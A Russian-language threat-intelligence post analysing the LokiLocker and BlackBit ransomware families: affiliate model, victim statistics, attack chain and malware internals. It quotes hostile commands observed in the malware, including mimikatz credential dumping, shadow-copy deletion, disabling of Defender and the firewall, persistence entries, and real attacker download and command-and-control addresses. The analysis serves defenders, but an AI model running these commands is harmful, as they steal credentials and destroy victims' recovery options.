Как бизнес страдает от кибервымогателей LokiLocker и BlackBit

1695727723046.png

Программы-вымогатели стали одним из главных киберугроз для российских компаний. По данным F.A.C.C.T., за последний год число атак с их использованием увеличилось на 33% по сравнению с 2021 годом. Среди наиболее распространенных шифровальщиков в России можно выделить Phobos, Dharma, CryLock и другие. Однако в последнее время на российском рынке появились новые игроки, основанные на Babuk, Conti и LockBit. Эти шифровальщики изначально были ориентированы на атаку западных компаний, но после того, как их исходные коды и билдеры попали в открытый доступ, они стали доступны для любых киберпреступников и хактивистов. В условиях геополитического конфликта эти программы-вымогатели превратились в “оружие” против российского бизнеса. Кроме того, стали активизироваться ранее малоизвестные в России семейства программ-вымогателей, например, LokiLocker. В этом блоге мы подробно рассмотрим этот шифровальщик и его подсемейство — BlackBit, которое часто атакует российские и белорусские организации.

Профайл вымогателей, работающих с шифровальщиками LokiLocker/BlackBit​

СпециализацияВымогательство выкупа у жертв за расшифровку данных
ЖертвыКомпании малого и среднего бизнеса по всему миру. 44% от общего числа атак, по нашим оценкам, приходится на Россию и Белоруссию.
Сумма выкупа$10000 – $100000

Сумма выкупа зависит от количества приобретаемых жертвой декрипторов (один декриптор расшифровывает данные на одном хосте)
Период активностиС лета 2021 года по настоящее время
Начальный вектор атакиСкомпрометированные службы удаленного доступа
Программа-вымогательПрограмма-вымогатель представляет собой обфусцированную .NET сборку. Программа-вымогатель имеет широкие функциональные возможности
ОсобенностиПрограмма-вымогатель не шифрует файлы на компьютерах с установленным персидским языком

Осуществляется шифрование только Windows-систем и, чаще всего, в выходные дни.
Программы-вымогатели предоставляются партнерам в рамках партнерской программы (RaaS, Ransomware-as-a-Service).
Атакующие не похищают данные жертвы, соответственно не имеют сайт утечек (DLS).
В качестве канала взаимодействия жертвы с атакующими используется электронная почта и Telegram.
По истечении 30-дневного срока выплаты выкупа программа-вымогатель уничтожает все данные в скомпрометированной системе


LokiLocker: кто такой этот «персидский принц» среди шифровальщиков?​

LokiLocker и BlackBit: история и особенности шифровальщиков В этом блоге мы расскажем о семействе программ-вымогателей LokiLocker и его подсемействе BlackBit, которые атакуют компании в России и других странах. Эксперты компании F.A.C.C.T., занимающейся цифровой криминалистике, провели анализ KillChain этих шифровальщиков.

Шифровальщики BlackBit LokiLocker Шифровальщики Программы-вымогатели LokiLocker были обнаружены летом 2021 года, но первый инцидент с их участием в России произошел только в марте 2022 года. Тогда эксперты F.A.C.C.T. были вызваны для расследования атаки на компанию, связанную с Ближним Востоком. Позже выяснилось, что LokiLocker активно атакует организации в разных странах, в том числе и в России.

В сентябре 2022 года появилось новое подсемейство LokiLocker — BlackBit, которое стало целиться на средний и малый бизнес в России и Беларуси. Программы BlackBit практически не отличаются от LokiLocker по функционалу, только по названию: они используют расширение “.BlackBit” для зашифрованных файлов и указывают “Black Bit” в записках с требованием выкупа.

LokiLocker — это довольно необычный шифровальщик, который имеет несколько интересных особенностей. Например, он проверяет установленные языки ввода на компьютере жертвы и не запускается, если среди них есть персидский язык (Persian). Также он конфигурируется с помощью текстового файла, а не аргументов командной строки, как большинство других шифровальщиков. Кроме того, он может уничтожить данные на скомпрометированной системе, если жертва не заплатит выкуп в течение 30 дней с момента заражения.

В марте 2022 года компания BlackBerry опубликовала результаты своего исследования LokiLocker. Авторы блога предположили, что проверка персидского языка может быть признаком того, что злоумышленники пытаются подставить иранских хакеров. Однако в конце блога они признали, что это может быть и просто случайностью.

LokiLocker и BlackBit: как работает партнерская программа шифровальщиков В этом блоге мы продолжим рассказ о семействе программ-вымогателей LokiLocker и его подсемействе BlackBit, которые атакуют компании в России и других странах. Эксперты компании F.A.C.C.T., занимающейся цифровой криминалистике, изучили способ распространения этих шифровальщиков через партнерскую программу (RaaS, Ransomware-as-a-Service).

Шифровальщики BlackBit LokiLocker Шифровальщики Программы-вымогатели LokiLocker предлагаются для использования по закрытой партнерской программе, которая называется LokiLocker RaaS. В андеграунде можно найти редкие объявления о наборе в эту программу, но общение с потенциальными партнерами ведется в скрытых каналах. В первых атаках с использованием LokiLocker в записках с требованием выкупа можно было увидеть никнеймы, которые связаны с персидскими группами Telegram, а также утилиты, которые имеют персидский язык в своем интерфейсе.

Сейчас сложно определить национальность злоумышленников, которые используют LokiLocker / BlackBit в своих атаках. Киберпреступность стала международной и глобальной. К примеру, в одной из первых атак с использованием LokiLocker идентификатор атакующих был “Sklad“.

Для проведения атак партнерам предоставляется скомпилированная программа-вымогатель, в которой указывается идентификатор атакующих и один или два адреса электронной почты для связи с жертвой. Жертва должна обратиться по электронной почте или в Telegram-чате, если он указан, чтобы получить инструкции по оплате выкупа. Имя файла программы-вымогателя соответствует первому адресу электронной почты, например: RickyMonkey@onionmail.org.exe

Некоторые образцы программ-вымогателей используются злоумышленниками в разных регионах. Так, например, программа-вымогатель, которая атаковала одну из российских компаний, была использована три месяца ранее в другой стране.

Для партнеров BlackBit создан специальный портал “Black Bit Premium”, который также используется программами-вымогателей BlackBit для загрузки публичного ключа RSA на зараженную систему. RSA — это криптографический алгоритм с открытым ключом.
Black Bit Premium



Шифровальщики BlackBit LokiLocker Шифровальщики Программы-вымогатели BlackBit используют один и тот же набор мастер-ключей RSA для шифрования данных на компьютерах жертв. Это означает, что если у экспертов есть доступ к этим ключам, они могут расшифровать данные без оплаты выкупа. В отличие от BlackBit, программы-вымогатели LokiLocker используют 6 разных наборов мастер-ключей RSA, которые меняются в разных образцах.

Не совсем понятно, зачем создавать подсемейство BlackBit, если оно почти не отличается от LokiLocker. Может быть, это связано с маркетинговой стратегией или с попыткой обойти антивирусные решения. Интересно, что некоторые партнеры используют как BlackBit, так и LokiLocker в своих атаках. Например:
Возможно, BlackBit – премиальная партнерская программа, и появление BlackBit связано с перераспределением внутри RaaS или другими внутренними процессами.

Как LokiLocker и BlackBit атакуют российские компании: обзор жертв в мире​


Как LokiLocker и BlackBit атакуют российские компании: обзор жертв в мире. Эксперты компании F.A.C.C.T., занимающейся цифровой криминалистике, собрали информацию о жертвах на основе данных из своих расследований и портала VirusTotal. Статистика охватывает период с апреля 2022 года по сегодняшний день.

LokiLocker и BlackBit не замечены в краже данных у жертв, поэтому у них нет сайта для публикации украденных данных (DLS, Data Leak Site). Поэтому сложно оценить полный объем и географию всех их атак. Однако мы можем привести некоторые цифры и факты о жертвах, которые стали известны нам.
Россия11 (BlackBit)
10 (LokiLocker)
Барнаул1 (BlackBit)
1 (LokiLocker)
Иркутск1 (BlackBit)
Истра1 (BlackBit)
Казань1 (BlackBit)
Краснодар1 (BlackBit)
Красноярск1 (BlackBit)
Ленинск-Кузнецкий1 (LokiLocker)
Липецк1 (BlackBit)
Москва3 (BlackBit)
4 (LokiLocker)
Новосибирск1 (LokiLocker)
Санкт-Петербург1 (BlackBit)
2 (LokiLocker)
Ульяновск1 (LokiLocker)
Челябинск1 (LokiLocker)
Белоруссия3 (BlackBit)
3 (LokiLocker)
Барановичи1 (LokiLocker)
Гомель1 (BlackBit)
Минск2 (LokiLocker)
Могилев2 (BlackBit)
Европа11 (BlackBit)
2 (LokiLocker)
Великобритания2 (BlackBit)
Венгрия, Вац1 (BlackBit)
Германия1 (BlackBit)
1 (LokiLocker)
Испания, Вильянуэва-де-ла-Каньяда1 (BlackBit)
Италия, Лумедзане1 (BlackBit)
Нидерланды1 (BlackBit)
Украина, Белая Церковь1 (BlackBit)
Украина, Киев1 (BlackBit)
Украина, Одесса1 (BlackBit)
Франция1 (BlackBit)
Чехия, Прага1 (LokiLocker)
Азия3 (BlackBit)
6 (LokiLocker)
Вьетнам, Ханой1 (LokiLocker)
Гонконг1 (BlackBit)
Индия, Гувахати1 (BlackBit)
Индия, Джайпур1 (LokiLocker)
Индия, Мумбаи1 (LokiLocker)
Индия, Сурат1 (LokiLocker)
Индия, Ченнаи1 (BlackBit)
Иран, Тебриз1 (LokiLocker)
Китай, Пекин1 (LokiLocker)
Африка1 (LokiLocker)
ЮАР, Кейптаун1 (LokiLocker)
Южная Америка1 (BlackBit)
6 (LokiLocker)
Боливия, Ла-Пас1 (BlackBit)
1 (LokiLocker)
Бразилия, Маринга1 (LokiLocker)
Бразилия, Сан-Паулу1 (LokiLocker)
Бразилия, Сантана-ди-Парнаиба1 (LokiLocker)
Колумбия, Перейра1 (LokiLocker)
Перу, Лима1 (LokiLocker)
Северная Америка3 (BlackBit)
1 (LokiLocker)
Канада, Ватерлоо1 (BlackBit)
Мексика, Мехико1 (BlackBit)
США, Нью-Йорк1 (BlackBit)
США1 (LokiLocker)

Из таблицы можно увидеть, что LokiLocker / BlackBit атакуют компании в разных странах мира, но особенно активны в России и Белоруссии — эти страны составляют около 44% от всех атак с использованием этих шифровальщиков.

KillChain LokiLocker / BlackBit: описание типовой атаки​

Получение доступа​

В качестве начального вектора атаки злоумышленники часто используют скомпрометированные службы удаленного доступа, такие как RDP (Remote Desktop Protocol). Это позволяет им получить доступ к публично доступным терминальным серверам и, таким образом, проникнуть в ИТ-инфраструктуру жертвы. Такие атаки являются одной из наиболее распространенных техник получения первоначального доступа для киберпреступников, занимающихся вымогательством за расшифровку зашифрованных данных.
Для получения доступа к терминальному серверу злоумышленники могут использовать метод подбора имени пользователя и пароля 1. Кроме того, они могут приобрести корректные учетные данные у других злоумышленников, например, у брокеров начального доступа в подпольном сообществе

Подготовка к продолжению атаки​

После того, как атакующие проникают на зараженный хост, они загружают на него свой набор инструментов или его часть (T1105) и пытаются укрепить свое положение и добыть привилегированные учетные записи, чтобы расширить свое влияние в сети.

Для извлечения привилегированных учетных записей атакующие применяют легитимную утилиту mimikatz (T1003). Кроме того, программа-вымогатель LokiLocker / BlackBit имеет в настройках параметр “mimikatz“, согласно которому программа скачивает из интернета утилиту mimikatz и запускает ее с такими аргументами командной строки:
"privilege::debug" "log {LOG_NAME}.txt" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" exit

LOG_NAME – случайное имя файла отчета.

Для получения списка пользователей в Active Directory (T1087) некоторые партнеры пользовались .NET утилитой LoginParser (LoginParser.exe).

Для подбора паролей к учетным данным (T1110) атакующие используют различные сборки .NET утилиты AccountRestore (AccountRestore.exe, AccountRestore 2.exe)

Некоторые партнеры использовали утилиты NirSoft для извлечения паролей (https://www.nirsoft.net/password_recovery_tools.html):

  • CredentialsFileView (CredentialsFileView.exe) (T1555.004);
  • OperaPassView(OperaPassView.exe), WebBrowserPassView (WebBrowserPassView.exe) (T1555.003);
  • RouterPassView (RouterPassView.exe) (T1552.001);
  • VNCPassView (VNCPassView.exe) (T1552.002);
  • PstPassword (PstPassword.exe) (T1552.001).

Сбор информации об инфраструктуре​

Атакующие применяют следующие сканеры сети для разведки:

  • Advanced Port Scanner (https://www.advanced-port-scanner.com/) (Advanced_Port_Scanner_2.5.3869.exе);
  • SoftPerfect Network Scanner (https://www.softperfect.com/products/networkscanner/) (nasp.exe);
Атакующие также используют разные версии консольной утилиты NS (NS.exe, 5-NS.exe) для поиска и подключения общих ресурсов сети (Shares) (T1135) и монтирования скрытых разделов. Такие утилиты ранее встречались в атаках с использованием программы-вымогателя Dharma.
Консольная утилита NS


Атакующие применяли утилиту Everything (ET.exe) для поиска файлов и папок. Основная цель была найти текстовые файлы с аутентификационными данными (T1552).

Кроме того, злоумышленники просматривали документы на хостах, но не крали их. Вероятно, это делалось для оценки финансового положения жертвы и определения размера выкупа.

Способы распространения атаки в сети​

Для продвижения по сети партнеры используют RDP (T1021.001) и учетные данные, которые были похищены или получены в результате успешного перебора паролей (brute force) (T1110).

Подготовка к развертыванию​

Перед запуском программы-вымогателя атакующие отключают антивирусное ПО (T1562.001). Некоторые варианты программ-вымогателей LokiLocker / BlackBit часто повторно используются в атаках, и после первых атак они могут быть загружены на VirusTotal, онлайн-песочницы и прочие сервисы, поэтому информация о них зачастую уже есть в Windows Defender и антивирусных продуктах. Также многие антивирусные программы и EDR знают о «поведении» в системе программ-вымогателей LokiLocker / BlackBit. Все это заставляет злоумышленников предварительно обезвреживать установленные в зараженной системе средства защиты.

Для обезвреживания средств защиты атакующие могут применять следующие легитимные утилиты:

  • Process Hacker (PH.exe);
  • KAV Removal Tool (KAVREMVR.exe);
  • ESET AV Remover (avremover_nt32_enu.exe, avremover_nt64_enu.exe);
  • IObit Unlocker (unlocker-setup.exe);
  • Revo Uninstaller (RevoUninProSetup.exe).

Развертывание​

Распространение программы-вымогателя по ИТ-инфраструктуре жертвы производилось атакующими преимущественно вручную (T1570).

При расследовании атаки на одну из российских компаний был выявлен запуск злоумышленниками старого файлового вируса Neshta. Впоследствии были выявлены еще несколько образцов программ-вымогателей LokiLocker / BlackBit из атак в других странах, также инфицированных вирусом Neshta. Возможно, атакующие использовали инфицированный инструмент, либо вирус использовался в качестве оригинального способа противодействия средствам безопасности.

В большинстве случаев шифрование данных жертвы производилось в выходные дни. Продолжительность атак с использованием программ-вымогателей LokiLocker / BlackBit составляет, по нашим оценкам, от суток до нескольких дней.

Для расшифровки данных для каждого хоста требуется свой декриптор, злоумышленники берут оплату за расшифровку в зависимости от количества хостов, которые требуется расшифровать.

Анализ BlackBit​


Анализ программы-вымогателя BlackBit​

Программа-вымогатель LokiLocker / BlackBit представляет собой сборку .NET (v4.0.30319), разработанную на языке программирования C#. Исполняемый файл программы-вымогателя имеет формат PE32, крайне редко – PE32+.
Все образцы LokiLocker / BlackBit обфусцированы. Ранее для обфускации LokiLocker использовался протектор NETGuard с использованием плагина виртуализации KoiVM v0.2.0-custom. Для всех образцов BlackBit используется один и тот .NET обфускатор. Этот же обфускатор также используется для половины образцов LokiLocker и вспомогательных утилит. Примечательно, что после обфускации данный протектор устанавливает в защищенных образцах значение временной метки PE (PE timestamp), равное 5000A574h, что соответствует 2012-07-13 22:47:16 (UTC), и значение контрольной суммы, равное 0x00023BFB.
Ранее уже было сказано, что при запуске программа-вымогатель проверяет на скомпрометированной системе установленные языки ввода. Если установлен персидский язык (Persian), программа завершает свою работу. Также в коде программы содержится строка “Iran“.
При запуске LokiLocker возможно указать аргумент командной строки “log“, чтобы программа создавала текстовый файл отчета “logs.txt” в текущем каталоге. Однако в BlackBit такая возможность отсутствует.
Программа осуществляет попытку открытия в текущем каталоге текстового файла конфигурации “loki.txt” (описание параметров конфигурации приведено ниже). В некоторых последних образцах BlackBit для файла конфигурации используется имя “b.txt“. Если данный файл существует, он копируется в каталог “%AllUsersProfile%“:
%AllUsersProfile%\config.BlackBit
Если в конфигурационном файле “%AllUsersProfile%\config.BlackBit” не указан параметр отключения автозапуска “nostartup“, программа осуществляет следующие действия:
  • создает копии своего исполняемого файла в каталоге Startup текущего пользователя под именем “winlogon.exe” и под случайным именем;
  • копирует свой исполняемый файл в каталог “%AppData%“:
    %AppData%\winlogon.exe
  • создает задачу планировщика:
    schtasks /CREATE /SC ONLOGON /TN BlackBit /TR %AppData%\winlogon.exe /RU SYSTEM /RL HIGHEST /F
  • копирует свой исполняемый файл в каталог %AllUsersProfile%:
    %AllUsersProfile%\winlogon.exe
  • создает следующий параметр в системном реестре:
    [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Invoke]
    “Michael Gillespie”=”%AllUsersProfile%\winlogon.exe”
  • копирует свой исполняемый файл в каталог CommonStartup под именем “winlogon.exe“;
  • копирует свой исполняемый файл в каталог “%Windows%“:
    %Windows%\winlogon.exe
  • создает параметр в системном реестре:
    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Invoke]
    “Michael Gillespie”=”%Windows%\winlogon.exe”
  • извлекает в каталог Startup текущего пользователя пакетный файл “wvtymcow.bat” со следующим содержимым:
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Далее программа извлекает файл с иконкой, которую ассоциирует в системе с расширением зашифрованных файлов “.BlackBit“. Также программа извлекает HTA-файл “%AllUsersProfile%\info.BlackBit” с требованием выкупа за расшифровку и таймером отсчета времени выплаты, компилирует с помощью Csharp содержащийся в теле программы исходный код на C# в EXE-файл со случайным именем в каталог “%AllUsersProfile%“. Данный EXE-файл при запуске выводит сообщение о
CMD/BATCH:
[HKCR\BlackBit\shell\open\command] ""= "%AllUsersProfile%\{RND}.exe "%l""
RND – случайное имя.
Сообщение о шифровании, открываемое при открытии файлов “.BlackBit” (пример)


Программа-вымогатель проверяет наличие администраторских прав пользователя, при отсутствии пытается запустить свой исполняемый файл из-под администраторской учетной записи (runas). В случае неудачи, программа завершает свою работу.

Программа завершает следующие процессы:
wxserverwxserverviewsqlservrragui
superviseculturertvscandefwatch
winwordqbw32qbdbmgrqbupdate
qbcfmonitorserviceaxlbridgeqbidpservicehttpd
fdlaunchermsdtsrvrtomcat6zhudongfangyu
vmware-usbarbitator64vmware-converterdbsrv12msftesql
sqlagentsqlbrowsersqlwriteroracle
ocssddbsnmpsynctimeagntsvc
mydesktopqosisqlplussvcxfssvcconmydesktopservice
ocautoupdsagntsvcagntsvcagntsvc
encsvcfirefoxconfigtbirdconfigocomm
mysqldmysqld-ntmysqld-optdbeng50
sqbcoreserviceexcelinfopathmsaccess
mspubonenoteoutlookpowerpnt
steamthebatthebat64thunderbird
visiowinwordwordpad


Программа останавливает следующие системные службы:
defwatchccevtmgrccsetmgrsavroam
sqlservsqlagentsqladhlpculserver
rtvscansqlbrowsersqladhlpqbidpservice
quickboooks.fcsqbcfmonitorservicesqlwritermsmdsrv
tomcat6zhundongfangyuvmware-usbarbitator64vmware-converter
dbsrv12dbeng8wrappermssqlserver
mssql$contoso1msdtcsqlserveragentvds

Для удаления теневых копий разделов, удаления резервных копий состояния системы, отключения восстановления в загрузочном меню Windows, а также для отключения брандмауэра Windows выполняет следующие команды:

CMD/BATCH:
vssadmin delete shadows /all /quiet
wbadmin DELETE SYSTEMSTATEBACKUP
wmic shadowcopy delete
wbadmin delete catalog -quiet
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
netsh advfirewall set currentprofile state off
netsh firewall set opmode mode=disable

Также программа-вымогатель удаляет точки восстановления системы, очищает корзину и отключает Windows Defender с помощью изменения значений параметров реестра Windows:

CMD/BATCH:
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableBehaviorMonitoring"=REG:DWORD:1
"DisableOnAccessProtection"= REG:DWORD:1
"DisableScanOnRealtimeEnable"= REG:DWORD:1
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"= REG:DWORD:1

Далее вымогатель с помощью функций WinInet API направляет HTTP-запрос POST на ресурс злоумышленников “ttp://application-api.xyz/api/index.php” (User-Agent: “BlackBit/1.0“) со следующими данными:
unique-id={ID}&disk-size={DISK_SIZE}&user={USER}&cpu-name={CPU_NAME}&ram-size={RAM_SIZE}&os-name={OS_NAME}

  • D – идентификатор жертвы, соответствующий серийному номеру системного тома (8 шестнадцатеричных символов), либо серийному номеру жесткого диска #0;
  • DISK_SIZE – размер диска;
  • USER – идентификатор атакующих (имя пользователя партнерского портала);
  • CPU_NAME – название процессора;
  • RAM_SIZE – размер оперативной памяти;
  • OS_NAME – название и версия операционной системы.

В ответ программа получает данные в формате JSON, в которых содержится публичный ключ RSA, предназначенный для шифрования данных.

Если публичный ключ не удается загрузить с интернет-ресурса атакующих, программа создает пару ключей RSA-2048 с помощью класса .Net RSACryptoServiceProvider. Сгенерированный приватный ключ в формате XML, а также информация о системе шифруются с помощью содержащихся в теле программы публичных ключей RSA. В программе содержится 5 публичных ключей RSA: 4 публичных ключа RSA-4096 и 1 публичный ключ RSA-3072. Публичные ключи RSA-4096 используются для шифрования по частям приватного ключа в формате XML, а ключ RSA-3072 используется для шифрования информации о системе.

Информация о системе содержит следующие данные: идентификатор жертвы; размер диска; название процессора; размер оперативной памяти; временная зона; формат региона; внешний IP-адрес, полученный с помощью HTTP-запроса по ссылке “ttp://ip-api.com/json“; адреса электронной почты и идентификатор атакующих; логический результат проверки работоспособности функций Cryptography API: Next Generation (CNG) (0 или 1).

ак выглядит содержимое информации о скомпрометированной системе до шифрования


Общий размер указанных зашифрованных данных составляет 2 432 байта. Эти зашифрованные данные в кодировке Base64 сохраняются в файл “%AllUsersProfile%\Cpriv.BlackBit“. Также зашифрованные данные записываются в параметр системного реестра:

Код:
[HKCU\SOFTWARE\BlackBit]
"full"= REG_BINARY:{ENC_PRIVKEY_DATA}


ENC_PRIVKEY_DATA – зашифрованные приватный ключ RSA-2048 и информация о системе.
Полученный или сгенерированный публичный ключ RSA, а также время окончания срока выплаты выкупа сохраняются в раздел реестра:
CMD/BATCH:
[HKCU\SOFTWARE\BlackBit]
"public"= REG_BINARY:{ENC_PUBKEY_DATA}
"timer"= REG_BINARY:{ENC_TIMER_DATA}

  • ENC_PUBKEY_DATA – зашифрованный с помощью побайтовой операции XOR со значением 11h публичный ключ RSA-2048 в формате XML.
  • ENC_TIMER_DATA – зашифрованная с помощью побайтовой операции XOR со значением 54h строка со временем окончания срока выплаты выкупа за расшифровку данных. Обычно время окончания срока выплаты соответствует времени спустя 30 суток после первого запуска программы-вымогателя на компьютере.

1695731838005.png

Если параметр системного реестра “public” существует, получение или генерация ключей RSA-2048 не осуществляется, программой используется ключ, извлеченный из указанного параметра реестра.

В последних выявленных образцах LokiLocker функциональность по загрузке публичного ключа RSA с ресурса злоумышленников не используется, пара ключей RSA генерируются непосредственно на компьютере.

Шифрование файлов​

Программа-вымогатель шифрует файлы в нескольких потоках на всех дисках и на доступных сетевых ресурсах. LokiLocker перед шифрованием монтирует скрытые разделы, но BlackBit этого не делает.

Программа-вымогатель пропускает файлы в каталогах с атрибутом “системный”, а также в следующих каталогах:
  • %Windows%
  • %SystemDrive%\EFI
  • %SystemDrive%\$Recycle.Bin

Программа-вымогатель не шифрует свои файлы: файлы с расширениями “.BlackBit” и с именами “Restore-My-Files.txt“, “info.hta“.

По умолчанию, если не установлен параметр “full“, не шифруются файлы со следующими расширениями:

.exe“, “.dll“, “.msi“, “.com

В некоторых образцах BlackBit параметр “full” не используется, в этом случае осуществляется шифрование всех файлов.

Файлы размером до 1 572 864 байт шифруются полностью. В файлах большего размера шифруются 3 блока по 256 килобайт: в начале, конце и середине файла. Шифрование содержимого файлов производится с помощью алгоритма шифрования AES-256 GCM (Galois/Counter Mode), реализованного с помощью функций CNG API. Генерация 32-байтного ключа и 12-байтного nonce осуществляется с помощью функции CNG API BCryptGenRandom. Ключ и nonce шифруются с помощью сгенерированного или загруженного публичного ключа RSA-2048 и дописываются в конец зашифрованного файла (256 байт).

Зашифрованные файлы именуются следующим образом:
[{EMAIL1}][{ID}]{FILENAME}.BlackBit
  • EMAIL1 – первый адрес электронной почты атакующих.
  • ID – идентификатор жертвы, соответствующий серийному номеру системного тома (8 шестнадцатеричных символов), либо серийному номеру жесткого диска #0.
  • FILENAME – оригинальное имя файла.
Реже в некоторых образцах для зашифрованных файлов используются другие расширения, например, “.KTBR” и “.onion700“.

В каждом обработанном каталоге вымогатель создает текстовые файлы Restore-My-Files.txt с требованием выкупа.
1695732403967.png

Если ключи были сгенерированы на компьютере, на каждом диске создаются файлы Cpriv.BlackBit, и в этом случае в текстовые файлы Restore-My-Files.txt добавляется следующая строка:

!!!Deleting “Cpriv.BlackBit” causes permanent data loss.

Для зашифрованных томов вымогатель устанавливает метку “Locked by BlackBit“.

На каждом диске программа-вымогатель создает файлы info.hta.
1695732445193.png

Программа изменяет обои рабочего стола .
1695732484583.png

Также программа помещает текст с информацией о шифровании файлов на экран входа пользователя в систему
1695732526934.png


Также программа изменяет информацию Original Equipment Manufacturer (OEM) в системном реестре:
Код:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation]
"Manufacturer"="Encrypted by BlackBit"
"SupportPhone"="All your important files have been encrypted.
If you want to restore them, write us to the e-mail: {EMAIL1}
Write this ID in the title of your message: {ID}
In case of no answer in 24 hours write us to this e-mail: {EMAIL2}"

После завершения шифрования файлов для затруднения их восстановления LokiLocker запускает дефрагментацию всех томов с помощью команды:

defrag /C /H

В программах-вымогателях BlackBit запуск дефрагментации не осуществляется.

Уничтожение данных​

Ранее мы уже говорили, что в значении параметра “timer” раздела реестра “HKCU\SOFTWARE\BlackBit” содержится зашифрованная строка (XOR 54h) со временем окончания срока выплаты выкупа, которое соответствует времени спустя 30 суток после первого запуска программы-вымогателя на компьютере.

Программа-вымогатель проверяет текущее время, если оно превышает указанное в параметре реестра “timer”, программа удаляет все файлы и перезаписывает MBR жесткого диска #0 (PhysicalDrive0). При загрузке с указанного жёсткого диска после перезаписи MBR в этом случае будет отображаться текст.

Если в файле конфигурации указан параметр “nofuck“, то программа в этом случае лишь не блокирует запуск Task Manager путем изменения значения параметра “DisableTaskMgr” в системном реестре. Если программа запущена и текущее время превышает время ультиматума, то также будет произведено уничтожение данных.
1695732826807.png


Дополнительный функционал​

В некоторых образцах LokiLocker содержится полезная нагрузка Loki.Payload.dll в виде сборки .NET (v4.0.30319).

Данная полезная нагрузка при отсутствии файла “C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe“, загружает его по ссылке “http://imagesource.zapto.org/bin/vbc.exe“.

Также полезная нагрузка пытается загрузить данные по ссылке “http://imagesource.zapto.org/bin/win7.jpg
“, из которых распаковывает и расшифровывает программный модуль. Если загрузить не удается, используется программный модуль, содержащийся в ресурсах полезной нагрузки.

Программный модуль внедряется в запущенный полезной нагрузкой процесс “C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe“.

В ресурсах полезной нагрузки находится программный модуль формата PE32 (EXE), содержащий код Meterpreter Shellcode Loader, который загружает Shellcode по адресу 157.90.17.53:7300 и передает ему управление.

Конфигурация программы-вымогателя​

При запуске программа проверяет наличие файла конфигурации “loki.txt” в текущем каталоге, если файл существует, он копируется под именем %AllUsersProfile%\config.BlackBit. В некоторых последних образцах BlackBit для файла конфигурации используется имя “b.txt“.

Файл конфигурации представляет собой текстовый файл, в каждой строке которого могут содержаться параметры. Проверка строки с параметром осуществляется с учетом регистра.
1695732919163.png

Странно, что партнеры, которые используют в атаках BlackBit, не совсем осведомлены о параметрах конфигурации BlackBit. Вполне возможно, что параметры используются по привычке, полученной от использования LokiLocker. Представленный на пример взят из реальной атаки, при этом используемый в атаке образец BlackBit, игнорировал параметры “full” и “psexec” (см. ниже в таблице). В другой же атаке нам достался файл конфигурации, где были указаны параметры с первой заглавной буквой: “Clast“, “Nofuck“, “Psexec“.
ПараметрОписание
nostartupНе осуществлять автозапуск своего исполняемого файла
updateОтобразить поддельное окно обновления Windows.

Для этого программа извлекает в каталог %Temp% HTA-файл под случайным именем и открывает его
noprintОтключает выполнение следующих действий программы-вымогателя:

1) Отключение настроек Windows Defender путем модификации следующих параметров реестра:
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
“DisableAntiSpyware”=REG_DWORD:1
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
“DisableRealtimeMonitoring”=REG_DWORD:1
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet]
“SubmitSamplesConsent”=REG_DWORD:1

2) Обновление групповых политик на компьютерах Active Directory с помощью команды:
powershell.exe -Command “Get-ADComputer -filter * -Searchbase ‘%s’ | foreach{ Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}
3) Выключение монитора.
В программах-вымогателях BlackBit действия 2 и 3 не осуществляются.
justnsШифровать файлы только на сетевых ресурсах
mimikatzПрограмма загружает утилиту mimikatzв зависимости от разрядности по ссылкам:

http://tb28.trainbit.com:8080/files/9727827484/v34832447675444A4C2B7263452F63516A6365445933624754316D58615165737857445172485352462F454D31386C4A5936532F6F31413D3D/x64.zip[/URL]
http://tb28.trainbit.com:8080/files/3727827484/v34832447675444A4C2B726538367672712B6973524D624149516541553132654362567742524D457354734165755678746134424777773D3D/Win32.zip[plain]
Загруженная утилита запускается программой-вымогателем со следующими аргументами:
“privilege::debug” “log {LOG_NAME}.txt” “sekurlsa::logonPasswords” “token::elevate” “lsadump::sam” exit
LOG_NAME – случайное имя файла отчета.[/TD]
[/TR]
[TR]
[TD]psexec[/TD]
[TD]В программах-вымогателях BlackBitне используется.

Распространяться по локальной сети с использованием PsExec.
Программа загружает утилиту PsExec в зависимости от разрядности по ссылкам:
[plain]http://tb28.trainbit.com:8080/files/5950827484/v3445A707851454F445077337A374879564C75567470314B70456E75694E386741663961454A2B4A78374E744C324442523768766C59413D3D/x64.zip[/URL]
http://tb28.trainbit.com:8080/files/7450827484/v3445A707851454F445077334C646B6B45354D393061476A4F36327739645344422F752B436C7A744554712F43446A4B4571662B666B673D3D/Win32.zip
nonsНе шифровать файлы на сетевых ресурсах
clastШифровать диск C последним. Если не указан параметр “nocdrive“, программа-вымогатель шифрует сначала важные файлы. Для поиска файлов для шифрования используются следующие специальные папки:

Favorites
Recent
Desktop
Personal
MyPictures
MyVideos
MyMusic

При этом программа может извлекать пути к шифруемым файлам из файлов ярлыков (LNK-файлов).
nocdriveНе шифровать диск C
disabletaskНе используется
nofuckНе блокировать запуск Task Manager путем изменения значения параметра “DisableTaskMgr” в системном реестре
nowolВ программах-вымогателях BlackBitне используется.

Не пробуждать хосты по сети, посылая сигнал WOL (Wake On LAN)
shutdownЗавершить работу Windows после шифрования файлов
norunНе осуществлять шифрование файлов (Kill Switch)
fullВ некоторых образцах BlackBitне используется, в этом случае осуществляется шифрование всех файлов.

Шифровать все файлы, не пропускать файлы в соответствии с белым списком расширений.


Загруженная утилита запускается программой-вымогателем из-под администраторской учетной записи ( runas ) со следующими аргументами командной строки:
-s \\{IP} “{RANSOM_APP_PATH}”
IP – адрес хоста в локальной сети.
RANSOM_APP_PATH – путь к исполняемому файлу программы-вымогателя.

Заключение​

